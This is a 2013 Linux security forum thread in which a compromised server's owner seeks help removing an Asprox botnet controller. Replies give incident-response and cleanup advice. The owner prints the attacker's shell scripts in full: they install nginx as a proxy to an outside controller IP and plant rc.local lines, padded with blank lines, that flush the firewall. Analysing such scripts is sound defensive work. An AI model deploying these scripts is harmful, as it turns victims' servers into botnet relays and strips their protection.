LinuxQuestions.org
Go Job Hunting at the LQ Job Marketplace
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 06-17-2013, 06:35 PM   #1
AdamCox9
LQ Newbie
 
Registered: Jun 2013
Posts: 2

Rep: Reputation: Disabled
Remove Asprox Botnet Controller from Linux Server


My Linux Server got hacked and a bot got installed on it. So far, I have removed every nginx process and file from my server and I am blocking all of the ports accept 80 and a randomly chosen port for SSH. Is anybody familiar with this and know of other things that I can do to remove this and figure out if it is still running?

Code:
Hello,

An IP hosted on your server, *##.##.###.##*, has been blacklisted by Spamhaus (http://www.spamhaus.org/sbl/query/SBL187854).  Unfortunately, because this is a violation of our AUP, and because the listing is negatively affecting other customers the listing must be immediately removed.

Please ensure that this listing has been removed by *Wednesday, June 19th*.  Failure to remove this listing may result in the suspension of your server.  Please update this ticket as soon as the listing has been removed.

Regards,

Matthew
Rackspace AUP

-------

Ref: SBL187854
##.##.###.##/32 is listed on the Spamhaus Block List - SBL
2013-06-15 20:16:59 GMT | SR32 | rackspace.com
Asprox botnet controller @##.##.###.## [compromised webserver]

The host at this IP address has been compromised by cybercriminals who have installed a malicious nginx-daemon at ##.##.###.##2 on port 8080 TCP. This nginx daemon is acting as malware botnet controller, used to control computers infected with a spambot called "Asprox".

Asproxy botnet controller located here:
http://##.##.###.##:8080/index.php?r=gate/getipslist&id=<botid>
http://##.##.###.##:8080/<botid><encrypted-string>

AS number: AS19994
AS name: RACKSPACE - Rackspace Hosting
Hostname: ##.##.###.##.static.cloud-ips.com

To get this issue resolved, the malicious nginx daemon needs to be removed from this host. In addition, additional steps needs to be taken to secure the system and ensure that it doesn't get compromised again (further instructions below).

Attention: The host at this IP address seems to be compromised/hijacked. Before you ask for removal of this listing, please ensure that:
1) All malicious files/processes have been removed/terminated
2) The password of the responsible user/FTP account has been changed (if you don't do this the issue will likely re-appear)
3) The customers personal computer has been scanned with an up to date Anti-Virus Software
4) All system software (IIS, Apache, PHP, Perl etc) is up to date
5) Any installed Content Management Software (CMS, like Wordpress, Joomla, Typo3 etc) as well as all installed 3rd party plugins are up to date

In addition, please ensure that you have secured your SSH access by hardening the SSH daemon and changing the password. A short guid how to secure SSH can be found here:
http://www.spamhaus.org/faq/section/...0Questions#362

Please consider that if you ignore the steps described above the issue will most likely re-appear and the IP address will get re-listed on Spamhaus SBL! Simply deleting the malicious file / process will *NOT* solve this issue!

Last edited by unSpawn; 06-17-2013 at 07:03 PM. Reason: //Add vBB code tags
 
Old 06-17-2013, 07:35 PM   #2
lleb
Senior Member
 
Registered: Dec 2005
Location: Florida
Distribution: CentOS/Fedora
Posts: 2,469

Rep: Reputation: 440Reputation: 440Reputation: 440Reputation: 440Reputation: 440
typically if your server gets hacked, then get what specific data you need and format reinstall the OS from scratch and lock it down with the proper implementation of both IPTables and SELinux along with proper permissions and your sshd.conf to never allow root to log in via ssh. lock it down as tight as you can.
 
Old 06-17-2013, 07:42 PM   #3
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,998
Blog Entries: 54

Rep: Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745
Quote:
Originally Posted by lleb View Post
typically if your server gets hacked, then get what specific data you need and format reinstall the OS from scratch
Typically when a server gets compromised one should first mitigate, then investigate, then reinstall and harden. Mitigation keeps contamination from spreading and investigation shows the point(s) of entry. Without proper investigation the OP learns nothing and the loophole may well be exposed again.
 
Old 06-17-2013, 07:56 PM   #4
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,998
Blog Entries: 54

Rep: Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745
Quote:
Originally Posted by AdamCox9 View Post
My Linux Server got hacked and a bot got installed on it.
- When did this happen?
- What's the distribution and release version?
- Was system software kept up to date?
- What services are / where exposed?
- What software did you run on your web server and was it kept up to date?


Quote:
Originally Posted by AdamCox9 View Post
So far, I have removed every nginx process and file from my server
Deleting files seems to be a natural reflex for new and seasoned admins alike. Unfortunately this only aids the cracker by covering up and hampering any investigation. Preserving files by creating a backup before deleting them ensures evidence is available should you or somebody else wish to investigate the situation. Without investigation you will remain clueless of how the cracker got in. Should you still have user shell history, login records, system and daemon log files (included archived ones), crontabs and other (recently?) modified files available then I suggest you copy them to another machine and run Logwatch on them. Should you have made a backup of files them I'm always interested.


Quote:
Originally Posted by AdamCox9 View Post
and I am blocking all of the ports accept 80 and a randomly chosen port for SSH. Is anybody familiar with this and know of other things that I can do to remove this and figure out if it is still running?
- While old please run commands from the Intruder Detection Checklist (CERT): http://web.archive.org/web/200801092...checklist.html.
- Please adjust commands if necessary and attach as plain text file (or pastebin) output of:
Code:
( \ps axfwwwe -opid,ppid,gid,uid,cmd 2>&1; \lsof -Pwln 2>&1; \ls -al /var/spool/cron 2>&1; \netstat -anTpe 2>&1; \lastlog 2>&1; \last -wai 2>&1; \who -a 2>&1 ) | tee /tmp/output.txt
- Please ensure your firewall logs all in and egress new connection requests.
* Depending on your version (see 'man logwatch') Logwatch may be run as:
Code:
logwatch.pl --numeric --detail 5 --service all --range All --archives --print 2>&1 | tee /tmp/logwatch.txt;'
 
Old 06-17-2013, 08:50 PM   #5
AdamCox9
LQ Newbie
 
Registered: Jun 2013
Posts: 2

Original Poster
Rep: Reputation: Disabled
Hackers Commands

The only commands they entered were:
Code:
nginx
cd /usr/local/
bash 20130615_mn.sh
nginx
The 20130615_mn.sh file looks like:

Code:
if which yum >/dev/null; then
    yum -y install gcc make nano
fi

if which aptitude >/dev/null; then
    aptitude update && aptitude -q -y install gcc make nano
fi

cd /opt/ && wget http://nginx.org/download/nginx-1.2.6.tar.gz &&
tar zxf nginx-1.2.6.tar.gz &&
cd nginx-1.2.6 &&
./configure --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --pid-path=/var/run/nginx.pid  --http-log-path=/var/log/nginx/error.log --error-log-path=/var/log/nginx/access.log --without-http_rewrite_module --without-http_gzip_module &&
make -j2 &&
make install &&
echo "worker_processes 4;
events {
        worker_connections 10240;
}
http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;
    sendfile on;
    tcp_nopush on;
    keepalive_timeout 0;
    tcp_nodelay on;
    server {
        listen 8080;
        server_name _;
        location / {
            proxy_pass http://144.76.42.88:8880/;
            proxy_set_header Host \$host;
            proxy_set_header X-Real-IP \$remote_addr;
            proxy_set_header X-Forwarded-For \$remote_addr;
            client_max_body_size    10M;
            client_body_buffer_size 128k;
            proxy_connect_timeout   90;
            proxy_send_timeout      90;
            proxy_read_timeout      90;
            proxy_buffer_size       4k;
            proxy_buffers           4 32k;
            proxy_busy_buffers_size 64k;
            proxy_temp_file_write_size 64k;
        }
    }
}" > /etc/nginx/nginx.conf

if [ -f /etc/rc.local ] ; then
    echo "


































nginx &
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -F" > /etc/rc.local
fi
e=$(netstat -napt | grep LISTEN | grep :8080 | awk '{print $7}' | perl -n -e '/([\d\.]+)/ && print "$1"')
test $e && kill -9 $e
/etc/rc.local
There were two other similar files:

20130507.sh
Code:
if which yum >/dev/null; then
    yum -y install gcc make nano
fi

if which aptitude >/dev/null; then
    aptitude update && aptitude -q -y install gcc make nano
fi

cd /opt/ && wget http://nginx.org/download/nginx-1.2.6.tar.gz &&
tar zxf nginx-1.2.6.tar.gz &&
cd nginx-1.2.6 &&
./configure --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --pid-path=/var/run/nginx.pid  --http-log-path=/var/log/nginx/error.log --error-log-path=/var/log/nginx/access.log --without-http_rewrite_module --without-http_gzip_module &&
make -j2 &&
make install &&
echo "worker_processes 4;
events {
        worker_connections 10240;
}
http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;
    sendfile on;
    tcp_nopush on;
    keepalive_timeout 0;
    tcp_nodelay on;
    server {
        listen 8080;
        server_name _;
        location / {
            proxy_pass http://144.76.42.72:8880/;
            proxy_set_header Host \$host;
            proxy_set_header X-Real-IP \$remote_addr;
            proxy_set_header X-Forwarded-For \$remote_addr;
            client_max_body_size    10M;
            client_body_buffer_size 128k;
            proxy_connect_timeout   90;
            proxy_send_timeout      90;
            proxy_read_timeout      90;
            proxy_buffer_size       4k;
            proxy_buffers           4 32k;
            proxy_busy_buffers_size 64k;
            proxy_temp_file_write_size 64k;
        }
    }
}" > /etc/nginx/nginx.conf

if [ -f /etc/rc.local ] ; then
    echo "


































nginx &
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -F" > /etc/rc.local
fi
e=$(netstat -napt | grep LISTEN | grep :8080 | awk '{print $7}' | perl -n -e '/([\d\.]+)/ && print "$1"')
test $e && kill -9 $e
/etc/rc.local
And, 20130615_mn_change_cfg.sh

Code:
echo "worker_processes 4;
events {
        worker_connections 10240;
}
http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;
    sendfile on;
    tcp_nopush on;
    keepalive_timeout 0;
    tcp_nodelay on;
    server {
        listen 8080;
        server_name _;
        location / {
            proxy_pass http://144.76.42.88:8880/;
            proxy_set_header Host \$host;
            proxy_set_header X-Real-IP \$remote_addr;
            proxy_set_header X-Forwarded-For \$remote_addr;
            client_max_body_size    10M;
            client_body_buffer_size 128k;
            proxy_connect_timeout   90;
            proxy_send_timeout      90;
            proxy_read_timeout      90;
            proxy_buffer_size       4k;
            proxy_buffers           4 32k;
            proxy_busy_buffers_size 64k;
            proxy_temp_file_write_size 64k;
        }
    }
}" > /etc/nginx/nginx.conf && killall nginx && nginx
But, the email message says that the hacker can remotely log-in through nginx, so they could have executed any commands forward.
 
Old 06-18-2013, 01:29 AM   #6
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,998
Blog Entries: 54

Rep: Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745Reputation: 2745
Quote:
Originally Posted by AdamCox9 View Post
The only commands they entered were
Thanks for posting those. That answers about one tenth of what I asked BTW.


Quote:
Originally Posted by AdamCox9 View Post
But, the email message says that the hacker can remotely log-in through nginx, so they could have executed any commands forward.
Sure but the only thing I'm seeing is Nginx being set up as a proxy at some Hertzner address.
 
Old 07-11-2013, 02:42 PM   #7
rebus
LQ Newbie
 
Registered: Mar 2008
Posts: 1

Rep: Reputation: 0
Hello Adam,
thank you for sharing the snippets of the code executed by the hackers to install the nginx proxy.


Based on the scripts:
1) remove the nginx from /etc/rc.local to prevent restart of it with next reboot
2) backup+remove /opt/nginx-1.2.6.tar.gz /opt/nginx-1.2.6
3) backup+remove /usr/sbin/nginx /etc/nginx/nginx.conf /var/run/nginx.pid /var/log/nginx/error.log /var/log/nginx/access.log /etc/nginx


I believe crucial points to prevent re-infection in your case:
1) change root password
2) check thouroughly the machines where root password was used - there is high chance that keylogger is installed there

I would be happy if you can share any other info/logs regardig Asprox on email <rebus (at) seznam.cz>

Best regards
Michal Ambroz

---------- Post added 07-11-13 at 02:43 PM ----------

More information on Asprox botnet:
http://rebsnippets.blogspot.com/asprox
http://www.trendmicro.com/cloud-cont...rox-reborn.pdf
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Linux webserver botnet pushes malware win32sux Linux - Security 1 10-02-2009 07:20 AM
LXer: Botnet of Linux Servers with Dynamic IP Discovered LXer Syndicated Linux News 0 09-14-2009 04:30 PM
LXer: Linux webserver botnet pushes malware LXer Syndicated Linux News 0 09-12-2009 05:00 PM
I want to remove RedHat which is the boot controller. possible? milad126 Ubuntu 9 08-25-2009 02:40 AM
How do you remove linux from domain controller jviola Linux - Networking 4 09-26-2006 07:24 AM


All times are GMT -5. The time now is 05:34 PM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration